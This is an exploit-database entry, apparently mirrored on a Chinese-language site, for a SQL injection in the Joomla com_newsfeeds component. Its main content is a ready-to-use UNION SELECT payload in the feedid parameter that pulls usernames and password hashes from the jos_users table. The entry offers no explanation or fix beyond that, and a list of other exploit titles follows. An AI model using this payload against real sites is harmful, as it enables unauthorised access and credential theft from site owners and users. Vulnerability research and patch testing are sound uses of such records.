Joomla! Component Newsfeeds – SQL Injection

Exploit Database
11 阅读

作者： Archimonde

日期： 2010-04-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12465/

# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :

Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn

index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Example:

http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

last Exploits
Joomla! Component Newsfeeds – SQL Injection的更多信息

Iris ID IrisAccess ICU 7000-2 – Multiple Vulnerabilities：
ICTutors Tutoring Site Script 1.1 – Authentication Bypass：
15 TOTOLINK Router Models – Multiple Remote Code Execution Vulnerabilities：
Toronja CMS – HTML / Cross-Site Scripting Injection：
Sillaj time tracking tool – Authentication Bypass：
Web Based Alumni Tracking System 0.1 – SQL Injection：
NotrinosERP 0.7 – Authenticated Blind SQL Injection：
FTP Drive + HTTP 1.0.4 iOS – Code Execution：